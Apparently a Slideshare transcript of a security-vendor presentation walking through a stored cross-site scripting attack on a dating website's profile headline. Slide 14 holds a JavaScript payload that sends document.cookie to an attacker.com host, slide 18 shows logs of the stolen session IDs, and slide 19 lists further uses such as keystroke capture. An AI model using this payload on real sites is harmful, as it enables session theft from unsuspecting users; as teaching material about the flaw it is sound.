• Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Be the first to comment
    Be the first to like this
No Downloads

Views

Total Views
389
On Slideshare
0
From Embeds
0
Number of Embeds
1

Actions

Shares
Downloads
0
Comments
0
Likes
0

Embeds 0

No embeds

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
    No notes for slide
  • Welcome to “Hacking Exposed: Web Application Attacks and Countermeasures” presented by Caleb Sima and Joel Scambray, co-authors of Hacking Exposed Web Applications 2 nd Edition.

Transcript

  • 1. Cross-site Scripting Attacks Caleb Sima S.P.I Dynamics
  • 2. Simple XSS Checking
  • 3. Fill in the forms
  • 4. User input is reflected back
  • 5. Let’s try some javascript
  • 6. Bingo!
  • 7. XSS on a large scale
    • Create a simple profile
    • Which text is seen by the most people?
  • 8. Let’s run a test
    • Plain vanilla XSS entry in the headline
  • 9. Let’s view the profile and see what happens
  • 10. Success!
  • 11. Does it execute in a displayed list of results?
  • 12. Yes it does.
  • 13. Create an external JS file 1. Attacker creates exploit profile 2. Victim executes date search 3. Headline is viewed. Exploited 4. Victim requests attack payload 5. Payload delivered. 6. Victim sends cookie to attacker Dating Website Attack Server
  • 14. Create the exploit payload document.write(&quot;<img src= http://attacker.com/ &quot; + document.cookie + &quot; width=0 >&quot;)
  • 15. Let’s execute the attack
    • Embed the script to download from the attackers server.
  • 16. View the profile
    • Success. Invisible execution
  • 17. Execute the attack via search
    • Everything looks normal
  • 18. Check out the attack logs
    • 2006-08-31 19:54:47 0.0.0.0 GET /a.js - 80 – 0.0.0.0 Mozilla/4.0+(compatible;+MSIE+6.0;+MSNIA;+Windows+98;+.NET+CLR+1.1.4322) 200 0 0
    • 2006-08-31 19:54:47 0.0.0.0 GET /pIDCode=2AD4A95012D09660 - 80 - 0.0.0.0 Mozilla/4.0+(compatible;+MSIE+6.0;+MSNIA;+Windows+98;+.NET+CLR+1.1.4322) 404 0 2
    • 2006-08-31 19:55:48 0.0.0.0 GET /a.js - 80 - 0.0.0.0 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322;+.NET+CLR+2.0.50727;+InfoPath.2) 200 0 0
    • 2006-08-31 19:55:48 0.0.0.0 GET /pIDCode=2AD4A95012D01871 - 80 - 0.0.0.0 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322;+.NET+CLR+2.0.50727;+InfoPath.2) 404 0 2
    • 2006-08-31 19:56:33 0.0.0.0 GET /a.js - 80 - 0.0.0.0 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322;+.NET+CLR+2.0.50727;+InfoPath.2) 304 0 0
    • 2006-08-31 19:56:33 0.0.0.0 GET /pIDCode=2AD4A95012D04309 - 80 - 0.0.0.0 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322;+.NET+CLR+2.0.50727;+InfoPath.2) 404 0 2
  • 19. Real Exploitation
    • Browser Zombies
    • Control any victim browser
    • Capture keystrokes
    • Capture browsing activity
    • Force the user to view sites of your choosing
  • 20. Try WebInspect SPI Dynamics, Inc. 115 Perimeter Center Place Suite 1100 Atlanta, GA 30346 Caleb Sima [email_address]